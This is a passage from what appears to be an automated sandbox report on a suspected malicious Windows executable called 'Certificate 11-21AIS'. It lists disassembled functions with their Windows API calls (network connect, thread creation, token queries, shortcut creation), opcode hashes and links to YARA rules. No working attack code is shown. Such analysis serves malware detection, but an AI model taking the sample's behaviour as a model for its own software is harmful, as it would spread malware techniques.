                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                              • String ID:
                                                                              • API String ID: 3633006590-0
                                                                              • Opcode ID: 1f3be90d9d76cffe92c6686f86abc9764250c9cc3afab35070d6c228b5b76efa
                                                                              • Instruction ID: 75e1d6e94bba7d4aaa449de61c8e3af4a1e8062600f9151ed7f9e042a5aec4e5
                                                                              • Opcode Fuzzy Hash: 1f3be90d9d76cffe92c6686f86abc9764250c9cc3afab35070d6c228b5b76efa
                                                                              • Instruction Fuzzy Hash: A82127355152159FDB25EB7CAC42FEA33ACFF06360F10046AF145C31C1EBA0D9909AE5
                                                                              Function 00918B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0091A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0091A84E
                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00918BD3
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00918BE2
                                                                              • connect.WSOCK32(00000000,?,00000010), ref: 00918BFE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastconnectinet_addrsocket
                                                                              • String ID:
                                                                              • API String ID: 3701255441-0
                                                                              • Opcode ID: 0c60c62926544db82a04b2e1de92399e046008471b7c638978a2092ca6dadfa3
                                                                              • Instruction ID: 5c2f1cb2ef91937edc655e194a87f90f8df1d8edd542291d30746c1cec42ffc5
                                                                              • Opcode Fuzzy Hash: 0c60c62926544db82a04b2e1de92399e046008471b7c638978a2092ca6dadfa3
                                                                              • Instruction Fuzzy Hash: 69219D753402149FCB10AB68C885FBE77A9EF49710F044559F946EB392CB74AC419B92
                                                                              Function 00918420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsWindow.USER32(00000000), ref: 00918441
                                                                              • GetForegroundWindow.USER32 ref: 00918458
                                                                              • GetDC.USER32(00000000), ref: 00918494
                                                                              • GetPixel.GDI32(00000000,?,00000003), ref: 009184A0
                                                                              • ReleaseDC.USER32(00000000,00000003), ref: 009184DB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ForegroundPixelRelease
                                                                              • String ID:
                                                                              • API String ID: 4156661090-0
                                                                              • Opcode ID: 073fe46f2c8aed2fe70f85643d0bde5d94ba4166c4a2ad00f64081fb27134e7f
                                                                              • Instruction ID: a634fdd3560e98246e2e26cbb50d27323fe8ff8ebd262d7b87cca0640b9626bf
                                                                              • Opcode Fuzzy Hash: 073fe46f2c8aed2fe70f85643d0bde5d94ba4166c4a2ad00f64081fb27134e7f
                                                                              • Instruction Fuzzy Hash: 74216F7AB01204AFD700EFA4DC85EAEBBF5EF49301F048479E85997291DA70AC40DB60
                                                                              Function 008DAF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 008DAFE3
                                                                              • SelectObject.GDI32(?,00000000), ref: 008DAFF2
                                                                              • BeginPath.GDI32(?), ref: 008DB009
                                                                              • SelectObject.GDI32(?,00000000), ref: 008DB033
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ObjectSelect$BeginCreatePath
                                                                              • String ID:
                                                                              • API String ID: 3225163088-0
                                                                              • Opcode ID: de260c14b2a252b42f5094dbc548719287a123a46f8ce199696c59c31ad2ae87
                                                                              • Instruction ID: 5bcba93299c056ae95cfcb964754221342362c3a429d71d6f28a7662c1e7a91b
                                                                              • Opcode Fuzzy Hash: de260c14b2a252b42f5094dbc548719287a123a46f8ce199696c59c31ad2ae87
                                                                              • Instruction Fuzzy Hash: 5121AFB5828209EFDB219F55EC48B9A7B6CFB10395F24431AE460D23A0E3708842EF91
                                                                              Function 008E217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __calloc_crt.LIBCMT ref: 008E21A9
                                                                              • CreateThread.KERNEL32(?,?,008E22DF,00000000,?,?), ref: 008E21ED
                                                                              • GetLastError.KERNEL32 ref: 008E21F7
                                                                              • _free.LIBCMT ref: 008E2200
                                                                              • __dosmaperr.LIBCMT ref: 008E220B
                                                                                • Part of subcall function 008E7C0E: __getptd_noexit.LIBCMT ref: 008E7C0E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                              • String ID:
                                                                              • API String ID: 2664167353-0
                                                                              • Opcode ID: 6f6a2d89a6bb7f82960afdb64bd7a7fb19547bf3e45a2aba7736ebc90bba1e8f
                                                                              • Instruction ID: 8203bc5fb4e04a760e268ddcf756286945fa2b695002b4d89815c66af49953b6
                                                                              • Opcode Fuzzy Hash: 6f6a2d89a6bb7f82960afdb64bd7a7fb19547bf3e45a2aba7736ebc90bba1e8f
                                                                              • Instruction Fuzzy Hash: 6D11E5321083C6AFDB11AF6A9C41D6B7B9CFF03774B100529FA14C6181EB71D81196A2
                                                                              Function 008FABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 008FABD7
                                                                              • GetLastError.KERNEL32(?,008FA69F,?,?,?), ref: 008FABE1
                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,008FA69F,?,?,?), ref: 008FABF0
                                                                              • HeapAlloc.KERNEL32(00000000,?,008FA69F,?,?,?), ref: 008FABF7
                                                                              • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 008FAC0E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                              • String ID:
                                                                              • API String ID: 842720411-0
                                                                              • Opcode ID: cbf93254b510fc29eb8be81902a685e9600c51dcb22cd18047bc8589e3500cbd
                                                                              • Instruction ID: d34c6e0afaa4108e9fd93ca4846ad654b3f5d48fb6514142943d87bd75e43c3a
                                                                              • Opcode Fuzzy Hash: cbf93254b510fc29eb8be81902a685e9600c51dcb22cd18047bc8589e3500cbd
                                                                              • Instruction Fuzzy Hash: A5013CB9215208BFDB144FB9DC48DAB3BADFF8A7657100469F949C3260DA71DC40DB61
                                                                              Function 008F9ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CLSIDFromProgID.OLE32 ref: 008F9ADC
                                                                              • ProgIDFromCLSID.OLE32(?,00000000), ref: 008F9AF7
                                                                              • lstrcmpiW.KERNEL32(?,00000000), ref: 008F9B05
                                                                              • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 008F9B15
                                                                              • CLSIDFromString.OLE32(?,?), ref: 008F9B21
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                              • String ID:
                                                                              • API String ID: 3897988419-0
                                                                              • Opcode ID: 942d1a807e1f7fd320fb59eb773daea56c058600541e69692ea08aa763119969
                                                                              • Instruction ID: aac14db5e2085806d8b14881d47c3a1e68e0839f8cfac0879a216707cd3e1b2f
                                                                              • Opcode Fuzzy Hash: 942d1a807e1f7fd320fb59eb773daea56c058600541e69692ea08aa763119969
                                                                              • Instruction Fuzzy Hash: 02018F7A611229BFDB114F64EC44FBE7AEDEB45361F144024FA45D2210E770DD40ABA0
                                                                              Function 00907A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00907A74
                                                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00907A82
                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00907A8A
                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00907A94
                                                                              • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00907AD0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                              • String ID:
                                                                              • API String ID: 2833360925-0
                                                                              • Opcode ID: a32cdfba7bff7946487e30b835b6cf7369f8897b4e3818275d00a340a5617c95
                                                                              • Instruction ID: e60ac0ceae1c8cd987c54e7ad3205570175dcc596dcc97f2a98896fd02c07a85
                                                                              • Opcode Fuzzy Hash: a32cdfba7bff7946487e30b835b6cf7369f8897b4e3818275d00a340a5617c95
                                                                              • Instruction Fuzzy Hash: 04012D79E19619DFDF04AFE4DC48ADDFB78FB0D721F000555D902B2290DB34AA509BA1
                                                                              Function 008FAAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 008FAADA
                                                                              • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 008FAAE4
                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008FAAF3
                                                                              • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 008FAAFA
                                                                              • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008FAB10
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                              • String ID:
                                                                              • API String ID: 44706859-0
                                                                              • Opcode ID: f8248c9337170dce2392e7dc17cb6c25f09e351830d0d12d7935ba0fd8d51561
                                                                              • Instruction ID: 5d492d0fdfb74167d2c7c8a9e59124e77044f3304b7764ff2cdf8f8c556ff5bb
                                                                              • Opcode Fuzzy Hash: f8248c9337170dce2392e7dc17cb6c25f09e351830d0d12d7935ba0fd8d51561
                                                                              • Instruction Fuzzy Hash: D4F062793152086FEB150FB4EC88E7B3B6DFF4A764F000029FA45C7190CA609C01DB61
                                                                              Function 008FAA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008FAA79
                                                                              • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008FAA83
                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008FAA92
                                                                              • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 008FAA99
                                                                              • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008FAAAF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                              • String ID:
                                                                              • API String ID: 44706859-0
                                                                              • Opcode ID: c2577dbe8b3a71d19b561d912c83d407d6e1bcdd7ae2490962ab0225e46fa70e
                                                                              • Instruction ID: d8c3b6ff2bdffceb99e5711bba3d3ed92365d7cf902cf0a9f5f3877cfc2763b7
                                                                              • Opcode Fuzzy Hash: c2577dbe8b3a71d19b561d912c83d407d6e1bcdd7ae2490962ab0225e46fa70e
                                                                              • Instruction Fuzzy Hash: 95F0AF792152186FEB141FA4AC88E7B3BACFF4A7A4F000019FA05C7190DA609C05DA61
                                                                              Function 008FEC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 008FEC94
                                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 008FECAB
                                                                              • MessageBeep.USER32(00000000), ref: 008FECC3
                                                                              • KillTimer.USER32(?,0000040A), ref: 008FECDF
                                                                              • EndDialog.USER32(?,00000001), ref: 008FECF9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                              • String ID:
                                                                              • API String ID: 3741023627-0
                                                                              • Opcode ID: fa5d0c1d30e379f0d7a59da8459eaeb2ac3b2c42ba0022f08efb34046d3ae295
                                                                              • Instruction ID: 73cf2986581ce9d10679d8251f7ecc58a020fbdc7b3986b8f21d67cfc55cadb0
                                                                              • Opcode Fuzzy Hash: fa5d0c1d30e379f0d7a59da8459eaeb2ac3b2c42ba0022f08efb34046d3ae295
                                                                              • Instruction Fuzzy Hash: EE01D6385207589BEB205F20DE4EFA67778FF00709F00055DB642E10E0DBF0AA44CB50
                                                                              Function 008DB0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • EndPath.GDI32(?), ref: 008DB0BA
                                                                              • StrokeAndFillPath.GDI32(?,?,0093E680,00000000,?,?,?), ref: 008DB0D6
                                                                              • SelectObject.GDI32(?,00000000), ref: 008DB0E9
                                                                              • DeleteObject.GDI32 ref: 008DB0FC
                                                                              • StrokePath.GDI32(?), ref: 008DB117
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                              • String ID:
                                                                              • API String ID: 2625713937-0
                                                                              • Opcode ID: 58fd518d942401c7e7e98c021de5cb42bff50911b59817776af6f4d195f84d94
                                                                              • Instruction ID: e585603f73cc5c6e0e685443afa5bb01e734362222bf3d51ee7caaa0619dbf12
                                                                              • Opcode Fuzzy Hash: 58fd518d942401c7e7e98c021de5cb42bff50911b59817776af6f4d195f84d94
                                                                              • Instruction Fuzzy Hash: CEF01938029648EFDB259F65EC0CB543B68FB017A6F188315E4A5852F0D7318956EF50
                                                                              Function 0090F23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CoInitialize.OLE32(00000000), ref: 0090F2DA
                                                                              • CoCreateInstance.OLE32(0094DA7C,00000000,00000001,0094D8EC,?), ref: 0090F2F2
                                                                              • CoUninitialize.OLE32 ref: 0090F555
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CreateInitializeInstanceUninitialize
                                                                              • String ID: .lnk
                                                                              • API String ID: 948891078-24824748
                                                                              • Opcode ID: 2b2e5d1ab9ebac44e9e835a6a2a61aeeef4bd74cc9c6ec1a5ef7ea5ead159147
                                                                              • Instruction ID: ee2afe0b4e7f38f29c538d0d88861a1f802a6ef85a406bf251a6e00e0fbc264b
                                                                              • Opcode Fuzzy Hash: 2b2e5d1ab9ebac44e9e835a6a2a61aeeef4bd74cc9c6ec1a5ef7ea5ead159147
                                                                              • Instruction Fuzzy Hash: 54A10971104201AFD300EF68C895EABB7A8FF99714F004A5DF595D7292EB70EA49CB92
                                                                              Function 0090E7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008C660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008C53B1,?,?,008C61FF,?,00000000,00000001,00000000), ref: 008C662F
                                                                              • CoInitialize.OLE32(00000000), ref: 0090E85D
                                                                              • CoCreateInstance.OLE32(0094DA7C,00000000,00000001,0094D8EC,?), ref: 0090E876
                                                                              • CoUninitialize.OLE32 ref: 0090E893
                                                                                • Part of subcall function 008C936C: __swprintf.LIBCMT ref: 008C93AB
                                                                                • Part of subcall function 008C936C: __itow.LIBCMT ref: 008C93DF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                              • String ID: .lnk
                                                                              • API String ID: 2126378814-24824748
                                                                              • Opcode ID: ba54d7b8b595a7c8775628e27eb1a2751e3136ccd359f2de46b5a0d40ceedb0e
                                                                              • Instruction ID: 071d956939e4c845539f7f4ffc0761943f15f200df5c5bf5b197fdc53c17bbc1
                                                                              • Opcode Fuzzy Hash: ba54d7b8b595a7c8775628e27eb1a2751e3136ccd359f2de46b5a0d40ceedb0e
                                                                              • Instruction Fuzzy Hash: FEA125756043019FCB14DF24C484E2AB7E9FF89314F148999F9999B3A1CB31EC45CB92
                                                                              Function 008E325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __startOneArgErrorHandling.LIBCMT ref: 008E32ED
                                                                                • Part of subcall function 008EE0D0: __87except.LIBCMT ref: 008EE10B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorHandling__87except__start
                                                                              • String ID: pow
                                                                              • API String ID: 2905807303-2276729525
                                                                              • Opcode ID: 37fabff30309a8c8059174b9a555ba8eec1bcc7f95e0e6b3a263074241e27b59
                                                                              • Instruction ID: ac88014c6b08621d6f814145cfe1c51fe5f1abeb81e034f66916497cbea2321d
                                                                              • Opcode Fuzzy Hash: 37fabff30309a8c8059174b9a555ba8eec1bcc7f95e0e6b3a263074241e27b59
                                                                              • Instruction Fuzzy Hash: 51516A31A0C28696CB156B1AD94577A3B94FB43712F208D28F4D5C33E9DF358EC8A746
                                                                              Function 00904606 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0095DC50,?,0000000F,0000000C,00000016,0095DC50,?), ref: 00904645
                                                                                • Part of subcall function 008C936C: __swprintf.LIBCMT ref: 008C93AB
                                                                                • Part of subcall function 008C936C: __itow.LIBCMT ref: 008C93DF
                                                                              • CharUpperBuffW.USER32(?,?,00000000,?), ref: 009046C5
